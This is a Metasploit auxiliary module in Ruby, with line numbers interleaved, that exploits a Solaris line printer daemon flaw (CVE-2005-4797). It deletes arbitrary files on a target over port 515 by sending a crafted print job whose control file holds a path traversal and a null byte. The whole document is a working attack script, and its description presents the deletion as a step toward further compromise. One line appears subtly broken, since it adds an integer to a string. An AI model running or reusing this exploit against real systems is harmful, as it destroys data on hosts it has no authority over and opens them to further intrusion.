1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'English'
7
class MetasploitModule < Msf::Auxiliary
8
  include Msf::Exploit::Remote::Tcp
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Solaris LPD Arbitrary File Delete',
16
        'Description' => %q{
17
          This module uses a vulnerability in the Solaris line printer
18
          daemon to delete arbitrary files on an affected system. This
19
          can be used to exploit the rpc.walld format string flaw, the
20
          missing krb5.conf authentication bypass, or simply delete
21
          system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
22
        },
23
        'Author' => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'CVE', '2005-4797' ],
27
          [ 'BID', '14510' ],
28
          [ 'OSVDB', '18650' ]
29
        ],
30
        'Notes' => {
31
          'Stability' => [SERVICE_RESOURCE_LOSS],
32
          'SideEffects' => [],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        Opt::RPORT(515),
41
        OptString.new('RPATH', [ true, 'The remote file path to delete']),
42
      ]
43
    )
44
  end
45

46
  def run
47
    r_hostname = Rex::Text.rand_text_alpha(1..8)
48
    r_user = Rex::Text.rand_text_alpha(1..8)
49
    r_spool = Rex::Text.rand_text_alpha(1..8)
50

51
    # Create a simple control file...
52
    control = "H#{r_hostname}\nP#{r_user}\n"
53

54
    # The job ID is squashed down to three decimal digits
55
    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
56

57
    # Establish the first connection to the server
58
    sock1 = connect(false)
59

60
    # Request a cascaded job
61
    sock1.put("\x02#{r_hostname}:#{r_spool}\n")
62
    res = sock1.get_once
63
    if !res
64
      print_status('The target did not accept our job request command')
65
      return
66
    end
67

68
    # Theoretically, we could delete multiple files at once, however
69
    # the lp daemon will append garbage from memory to the path name
70
    # if we don't stick a null byte after the path. Unfortunately, this
71
    # null byte will prevent the parser from processing the other paths.
72
    control << 'U' + ('../' * 10) + "#{datastore['RPATH']}\x00\n"
73

74
    dataf = Rex::Text.rand_text_alpha(100) + 1
75

76
    print_status("Deleting #{datastore['RPATH']}...")
77
    if !(
78
        send_file(sock1, 2, 'cfA' + jid + r_hostname, control) &&
79
        send_file(sock1, 3, 'dfa' + jid + r_hostname, dataf)
80
      )
81
      sock1.close
82
      return
83
    end
84

85
    print_good("Successfully deleted #{datastore['RPATH']} >:-]")
86
    sock1.close
87
  end
88

89
  def send_file(sock, type, name, data = '')
90
    sock.put(type.chr + data.length.to_s + ' ' + name + "\n")
91
    res = sock.get_once(1)
92
    if !(res && res[0] == "\0")
93
      print_status("The target did not accept our control file command (#{name})")
94
      return
95
    end
96

97
    sock.put(data)
98
    sock.put("\x00")
99
    res = sock.get_once(1)
100
    if !(res && res[0] == "\0")
101
      print_status("The target did not accept our control file data (#{name})")
102
      return
103
    end
104

105
    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
106
    return true
107
  end
108
end
109

110